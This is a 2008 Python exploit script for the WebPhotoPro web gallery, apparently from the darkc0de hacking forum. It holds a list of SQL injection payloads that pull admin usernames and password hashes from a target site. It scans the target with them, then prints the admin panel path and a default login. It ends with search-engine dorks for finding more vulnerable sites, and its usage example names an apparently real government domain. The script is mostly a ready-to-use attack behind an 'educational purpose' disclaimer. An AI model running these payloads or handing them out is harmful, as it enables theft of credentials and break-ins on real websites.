webphotopro.py.txt
Posted on 14 December 2008
#!/usr/bin/python # This was written for educational purpose only. Use it at your own risk. # Author will be not responsible for any damage! # !!! Special greetz for my friend sinner_01 !!! # !!! Special thanx for d3hydr8 and rsauron who inspired me !!! # ################################################################ # .___ __ _______ .___ # # __| _/____ _______| | __ ____ _ __| _/____ # # / __ |\__ \_ __ |/ // ___/ /_ / __ |/ __ # # / /_/ | / __ | | / < \___ \_/ / /_/ ___/ # # \____ |(______/__| |__|_ \_____>\_____ /\_____|\____ # # / / / # # ___________ ______ _ __ # # _/ ___\_ __ \_/ __ / / / # # \___| | / ___/ / # # \___ >__| \___ >/\_/ # # est.2007 / / forum.darkc0de.com # ################################################################ # --- d3hydr8 - rsauron - P47r1ck - r45c4l - C1c4Tr1Z - bennu # # --- QKrun1x - skillfaker - Croathack - Optyx - Nuclear # # --- Eliminator and to all members of darkc0de and ljuska.org# # ################################################################ import sys, os, re, time, urllib2 if sys.platform == 'linux' or sys.platform == 'linux2': clearing = 'clear' else: clearing = 'cls' os.system(clearing) if len(sys.argv) !=2: print " |---------------------------------------------------------------|" print "| b4ltazar[@]gmail[dot]com |" print "| 12/2008 WebPhotoPro exploit |" print "| Help: webphotopro.py -h |" print "| Visit www.darkc0de.com and www.ljuska.org |" print "|---------------------------------------------------------------| " sys.exit(1) for arg in sys.argv: if arg == '-h' or arg == '--help' or arg == '-help': print " |---------------------------------------------------------------|" print "| b4ltazar[@]gmail[dot]com |" print "| 12/2008 WebPhotoPro exploit |" print "| Usage: webphotopro.py www.site.com |" print "| Example: python webphotopro.py www.ere.gov.al |" print "| Visit www.darkc0de.com and www.ljuska.org |" print "|---------------------------------------------------------------| " sys.exit(1) vulnsql = ["art.php?idm=1'+and+1=2+union+all+select+1,2,3,4,5,6,concat_ws(char(58),username,password),8,9,10,11,12,13+from+editor/*", "rub.php?idr=1+and+1=2+union+all+select+1,2,3,4,5,6,concat_ws(char(58),username,password),8,9,10,11,12+from+editor--","rub.php?idr=1+and+1=2+union+all+select+1,2,3,concat_ws(char(58),username,password),5,6,7,8,9+from+editor--", "rub.php?idr=1+and+1=2+union+all+select+1,2,3,concat_ws(char(58),username,password),5,6,7,8,9,10+from+editor--","galeri_info.php?ida=1+and+1=2+union+all+select+1,2,3,concat_ws(char(58),username,password),5,6+from+editor/*", "galeri_info.php?ida=1+and+1=2+union+all+select+1,concat_ws(char(58),username,password),3,4,5,6,7+from+editor/*","rubrika.php?idr=1+and+1=2+union+all+select+1,concat_ws(char(58),username,password),3,4,5,6,7+from+editor--","rub.php?idr=176+and+1=2+union+all+select+1,2,3,4,5,6,concat_ws(char(58),username,password),8,9,10,11,12+from+editor/*"] site = sys.argv[1] if site[:4] != "http": site = "http://"+site if site[-1] != "/": site = site + "/" print " |---------------------------------------------------------------|" print "| b4ltazar[@]gmail[dot]com |" print "| 12/2008 WebPhotoPro exploit |" print "| Visit www.darkc0de.com and www.ljuska.org |" print "|---------------------------------------------------------------| " print " [-] %s" % time.strftime("%X") print " [+] Target:",site print "[+]",len(vulnsql),"Vulns loaded..." print "[+] Starting Scan... " for sql in vulnsql: print "[+] Checking:" ,site+sql.replace(" ","") print try: code = urllib2.urlopen(site+sql.replace(" ", "")).read() hash = re.findall("[a-f0-9]"*32,code) if len(hash) >=1: print "[w00t!w00t!]" ,site+sql.replace(" ","") print print "Admin panel: ",site+"admini/" print "Check for default login --> admin:demo" print except(urllib2.HTTPError): pass except(KeyboardInterrupt): pass print print print print "[!!!] For more target try next dorks: " print print ''' inurl:/art.php?idm= intext:"Powered by WebPhotoPro" inurl:/rub.php?idr= inurl:/galeri_info.php?lang= inurl:/galeri_info.php?l= inurl:/galeri_info.php?ida= inurl:/tekst.php?idt= inurl:/rubrika.php?idr= intext:"Powered by WebPhotoPro" site:al''' print print "Check for more details: http://packetstormsecurity.org/0808-exploits/webphotopro-sql.txt" print print " [-] %s" % time.strftime("%X")
